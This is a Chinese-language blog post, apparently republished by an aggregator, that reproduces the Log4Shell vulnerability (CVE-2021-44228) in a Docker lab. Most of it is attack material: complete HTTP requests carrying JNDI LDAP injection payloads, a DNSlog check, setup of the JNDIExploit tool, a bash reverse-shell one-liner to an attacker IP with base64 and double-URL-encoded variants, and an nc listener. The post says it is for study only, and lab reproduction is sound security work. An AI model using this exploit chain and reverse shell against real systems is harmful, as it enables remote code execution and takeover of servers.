(CVE-2021-44228)Apache log4j 远程命令执行

Posted 浪人联想

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了(CVE-2021-44228)Apache log4j 远程命令执行相关的知识,希望对你有一定的参考价值。

漏洞简介

Apache Log4j2是一款Java日志框架,大量应用于业务系统开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞(CVE-2021-44228)。
Apache Log4j2远程代码执行漏洞由Lookup功能引发。Log4j2在默认情况下会开启Lookup功能,用于将特殊值添加到日志中。此功能中也支持对JNDI的Lookup,但由于Lookup对于加载的JNDI内容未做任何限制,使得攻击者可以通过JNDI注入实现远程加载恶意类到应用中,从而造成RCE(远程代码执行)。

影响版本

Apache Log4j 2.x < 2.15.0-rc2

环境搭建

docker pull vulfocus/log4j2-rce-2021-12-09					#拉取漏洞镜像

docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09		#开启环境

漏洞复现

dnslog回显

访问:http://192.168.99.100:38080/hello

使用 BurpSuite 抓包:

右键改变请求方法:

请求包变为:

POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

Payload:$jndi:ldap://xxx.dnslog.cn/exp

本次使用为:$jndi:ldap://29l3ni.dnslog.cn/exp

加到请求包中:

POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

payload=$jndi:ldap://29l3ni.dnslog.cn/exp

点击send,查看 dnslog 回显:

成功回显,说明存在漏洞。

反弹shell

使用工具:https://github.com/zzwlpx/JNDIExploit.git

kali下载:

git clone https://github.com/zzwlpx/JNDIExploit.git

执行命令,开启服务:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.99.121				#攻击机ip

反弹shell命令:

bash -i >& /dev/tcp/192.169.99.121/4444 0>&1

初始请求包:

POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

payload格式 :$jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/[反弹shell命令的变形]

变形1:base64编码:

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA+JjE=

变形2:url编码:(注:这里url编码要选择URL-encode key characters)

YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%2bJjE%3d

变形3:再进行一次url编码:(注:这里url编码要选择URL-encode key characters)

YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d

将payload加到请求包中变为:

POST /hello HTTP/1.1
Host: 192.168.99.100:38080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

payload=$jndi:ldap://192.168.99.121:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xOTIuMTY5Ljk5LjEyMS80NDQ0IDA%252bJjE%253d

开启监听

nc -lvvp 4444

点击send


成功反弹shell!
仅供学习!

以上是关于(CVE-2021-44228)Apache log4j 远程命令执行的主要内容,如果未能解决你的问题,请参考以下文章

vCenter修复Apache log4j2漏洞(CVE-2021-44228, CVE-2021-45046)

Apache Log4j 漏洞(JNDI注入 CVE-2021-44228)

Apache Log4j-漏洞复现(CVE-2021-44228)

log4javascript 是不是容易受到 Apache Log4j(Java 日志库)远程代码执行 CVE-2021-44228 的攻击?

漏洞复现Apache Log4j2 lookup JNDI 注入漏洞(CVE-2021-44228)

CVE-2021-44228 和 log4j 1.2.17